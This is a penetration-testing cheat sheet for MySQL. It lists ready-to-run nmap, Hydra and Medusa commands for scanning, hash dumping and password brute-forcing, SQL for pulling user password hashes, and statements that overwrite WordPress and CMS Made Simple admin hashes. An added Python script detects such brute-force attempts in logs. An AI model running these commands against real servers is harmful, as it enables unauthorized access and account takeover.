MySQL (port 3306)

1. Nmap MySQL Scanning:

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10

2. Bruteforcing MySQL Credentials:

Hydra (for password brute-forcing):

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql

Medusa (alternative to Hydra):

medusa -h 10.10.10.10 -u bob -P rockyou.txt -M mysql
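Added example, not part of the original cheat sheet: the defender's side of step 2. This Python script scans MySQL/MariaDB error-log lines for the "Access denied" entries a Hydra or Medusa run leaves behind and flags source hosts that pass a failed-login threshold inside a time window; the log lines are constructed, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Failed-login line in the MySQL/MariaDB error log (MySQL 8 logs it at [Note] level, needs log_error_verbosity=3).
ACCESS_DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")

def parse_timestamp(line):
    """MySQL leads with one token ('2024-03-01T10:15:20.101000Z'), MariaDB with two
    ('2024-03-01 10:17:30'); try two tokens first because a bare date also parses."""
    parts = line.split()
    for candidate in (" ".join(parts[:2]), parts[0]):
        try:
            return datetime.fromisoformat(candidate.rstrip("Z"))
        except ValueError:
            continue
    return None

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_host: (peak failed logins inside one `window`, sorted
    usernames tried in that window)} for hosts reaching `threshold`."""
    attempts = defaultdict(list)                  # host -> [(ts, user), ...]
    for line in lines:
        m = ACCESS_DENIED_RE.search(line)
        ts = parse_timestamp(line) if m else None
        if ts:                                    # skip non-matching / undated lines
            attempts[m.group("host")].append((ts, m.group("user")))
    flagged = {}
    for host, events in attempts.items():
        events.sort()
        start, best, users = 0, 0, set()
        for end in range(len(events)):            # sliding window by timestamp
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 > best:
                best = end - start + 1
                users = {u for _, u in events[start:end + 1]}
        if best >= threshold:
            flagged[host] = (best, sorted(users))
    return flagged

# Constructed sample lines (not a real capture); source address mirrors the Hydra target above, last line is MariaDB format.
SAMPLE_LOG = [
    "2024-03-01T10:15:20.101000Z 41 [Note] Access denied for user 'root'@'192.168.101.178' (using password: YES)",
    "2024-03-01T10:15:20.412000Z 42 [Note] Access denied for user 'root'@'192.168.101.178' (using password: YES)",
    "2024-03-01T10:15:21.007000Z 43 [Note] Access denied for user 'admin'@'192.168.101.178' (using password: YES)",
    "2024-03-01T10:15:21.533000Z 44 [Note] Access denied for user 'root'@'192.168.101.178' (using password: YES)",
    "2024-03-01T10:15:22.090000Z 45 [Note] Access denied for user 'root'@'192.168.101.178' (using password: YES)",
    "2024-03-01 10:17:30 48 [Warning] Access denied for user 'bob'@'10.0.0.5' (using password: NO)",
]
```

On the sample, `detect_bruteforce(SAMPLE_LOG)` flags 192.168.101.178 with five failures in one window against the users root and admin, while the single failure from 10.0.0.5 is ignored. Whether these lines reach the error log at all depends on the server's logging level, so check that setting before relying on this as a detection source.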

3. Internal MySQL Database Enumeration:

Once you gain access to a MySQL database, you can run the following commands to enumerate users and databases:

  • List Databases:

    show databases;

  • Select a Database (example: textpattern):

    use textpattern;

  • List Tables in the Database:

    show tables;

  • Enumerate Users:

    select * from users;

  • List Specific User Information (e.g., username, email, password):

    select username,email,password from users;

4. MySQL to System Root:

Refer to the following guide for methods of privilege escalation from MySQL to system root on Linux: Recipe for Root - MySQL to System Root

5. Resetting a MySQL Admin Password:

If you have access to the database and can see the hash of the password for the admin user, you can update the password hash as follows:

Example for WordPress:

  1. Generate an MD5 hash of the new password (redcliff in this case):

    echo -n "redcliff" | md5sum

  2. Update the password in the MySQL database (assuming you are using MariaDB/MySQL):

    update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;

Example for CMS Made Simple 2.2.13:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';

6. Connecting Remotely to MySQL:

mysql -u root -h 192.168.101.184 -p
